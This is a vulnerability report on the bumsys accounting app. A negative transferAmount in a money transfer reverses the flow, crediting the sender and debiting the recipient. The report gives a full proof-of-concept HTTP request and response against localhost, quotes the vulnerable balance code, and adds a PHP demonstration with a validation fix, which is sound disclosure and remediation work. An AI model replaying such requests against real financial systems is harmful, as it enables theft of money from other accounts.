Input validation and money transfer vulnerability with negative number in unilogies/bumsys
Reported on
Mar 28th 2023
Description
I transfer money from account_1 to account_2. According to the scenario, account_1 should be debited and account_2 should be credited. But account_1 was credited and account_2 was debited. If I use a negative number whose magnitude exceeds the account balance, the money is still added to the transferring account and subtracted from the other account's balance.
Proof of Concept
Step 1. Create two accounts and do not tick "Negative value is allowed"
Step 2. Create a money transfer from account_1 to account_2
Step 3. Fill Amount with a negative number (param: transferAmount)
Step 4. View the account list and balances
Request:
POST /bumsys/xhr/?module=accounts&page=addNewTransfer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 9c12e4b9e57bc9efb83a996e70ecb27d6416958b
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------233078791433030603453235893249
Content-Length: 713
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/accounts/transfer-money/
Cookie: ea_session=j82te0avsr7l1ftll04hv52gla175nsp; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3; __e80d6ab52f32c63981a432872f0499f854e14685=1m2rjbbsnltbe4rjaue2d8pmig; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferDate"

2023-03-29
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAcountsFrom"

6
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAcountsTO"

7
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferAmount"

-100
-----------------------------233078791433030603453235893249
Content-Disposition: form-data; name="transferDescription"

Send money to account_2
-----------------------------233078791433030603453235893249--
Response:
HTTP/1.1 200 OK
Date: Tue, 28 Mar 2023 18:42:29 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
X-Powered-By: PHP/8.2.0
X-Frame-Options: DENY
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 69
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-success'>Transfer sucessfully completed</div>
[Image: account list and balances after the transfer]
Impact
Take money from another account by money transfer.
Occurrences
functions.php L1879-L2004
$accounts_balance = (
$gad["accounts_opening_balance"] + $gad["capital_amounts_sum"] + $gad["incomes_amount_sum"] + $gad["transfer_received_amount_sum"] + $gad["received_payments_amount_sum"] + $gad["payment_incoming_return_amount_sum"] + $gad["journal_incoming_payment_sum"]
) - (
$gad["loan_amount_sum"] + $gad["payment_amount_sum"] + $gad["transfer_send_amount_sum"] + $gad["advance_payment_amount_sum"] + $gad["journal_outgoing_payment_sum"] + $gad["payment_outgoing_return_amount_sum"]
);
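The following PHP is an added example, not code from unilogies/bumsys. It reuses the balance formula quoted above from functions.php to show why a negative transferAmount moves money in the wrong direction (the same raw value is added to the sender's transfer_send_amount_sum and the receiver's transfer_received_amount_sum, so a negative value shrinks both), and it adds a server-side check of the kind that would close the report. The function names, the ledger layout and the $negativeAllowed flag (standing in for the "Negative value is allowed" setting) are assumptions made for the illustration; the starting balances are constructed.

```php
<?php
// Added example, not bumsys code. Reproduces the functions.php balance formula
// and contrasts an unchecked transfer with a validated one. Function names,
// ledger layout and the $negativeAllowed flag are assumptions for illustration.
declare(strict_types=1);

// Balance formula as quoted in the report, unchanged apart from line breaks.
function accountBalance(array $gad): float
{
    return (
        $gad["accounts_opening_balance"] + $gad["capital_amounts_sum"]
        + $gad["incomes_amount_sum"] + $gad["transfer_received_amount_sum"]
        + $gad["received_payments_amount_sum"] + $gad["payment_incoming_return_amount_sum"]
        + $gad["journal_incoming_payment_sum"]
    ) - (
        $gad["loan_amount_sum"] + $gad["payment_amount_sum"]
        + $gad["transfer_send_amount_sum"] + $gad["advance_payment_amount_sum"]
        + $gad["journal_outgoing_payment_sum"] + $gad["payment_outgoing_return_amount_sum"]
    );
}

// A ledger holding only an opening balance; every other component starts at zero.
function newLedger(float $opening): array
{
    $keys = ["capital_amounts_sum", "incomes_amount_sum", "transfer_received_amount_sum",
        "received_payments_amount_sum", "payment_incoming_return_amount_sum",
        "journal_incoming_payment_sum", "loan_amount_sum", "payment_amount_sum",
        "transfer_send_amount_sum", "advance_payment_amount_sum",
        "journal_outgoing_payment_sum", "payment_outgoing_return_amount_sum"];
    $gad = array_fill_keys($keys, 0.0);
    $gad["accounts_opening_balance"] = $opening;
    return $gad;
}

// The flawed path: the raw amount goes into the sender's "send" sum and the
// receiver's "received" sum. A negative amount lowers both sums, so the
// sender's balance rises and the receiver's balance falls.
function applyTransferUnchecked(array &$from, array &$to, float $amount): void
{
    $from["transfer_send_amount_sum"] += $amount;
    $to["transfer_received_amount_sum"] += $amount;
}

// Hardened input check. Multipart form fields arrive as strings, so the value
// is validated as text first: digits with at most two decimals, no sign, no
// exponent, no whitespace. It must then be strictly positive, and unless the
// source account allows a negative balance it must be covered by funds.
function validateTransferAmount(string $raw, array $from, bool $negativeAllowed): float
{
    if (!preg_match('/^\d+(\.\d{1,2})?$/', $raw)) {
        throw new InvalidArgumentException("transferAmount must be a non-negative decimal number");
    }
    $amount = (float) $raw;
    if ($amount <= 0.0) {
        throw new InvalidArgumentException("transferAmount must be greater than zero");
    }
    if (!$negativeAllowed && accountBalance($from) - $amount < 0.0) {
        throw new InvalidArgumentException("insufficient balance in source account");
    }
    return $amount;
}

// Demonstration with constructed balances: account_1 opens at 500, account_2 at 0.
$acc1 = newLedger(500.0);
$acc2 = newLedger(0.0);
applyTransferUnchecked($acc1, $acc2, -100.0);
printf("unchecked -100: account_1=%.2f account_2=%.2f\n",
    accountBalance($acc1), accountBalance($acc2));

$acc1 = newLedger(500.0);
$acc2 = newLedger(0.0);
foreach (["-100", "1e3", "100"] as $input) {
    try {
        $amount = validateTransferAmount($input, $acc1, false);
        applyTransferUnchecked($acc1, $acc2, $amount);
        printf("accepted %s: account_1=%.2f account_2=%.2f\n",
            $input, accountBalance($acc1), accountBalance($acc2));
    } catch (InvalidArgumentException $e) {
        printf("rejected %s: %s\n", $input, $e->getMessage());
    }
}
```

The unchecked run reproduces the report: account_1 ends above its opening balance and account_2 ends negative even though negative values were not allowed for it. With the check in place, "-100" and "1e3" are rejected before any ledger row is written and only "100" is applied. Validating the string form rather than casting first matters because a cast silently accepts signs, exponents and surrounding whitespace, and the balance check belongs on the server regardless of what the form's UI enforces.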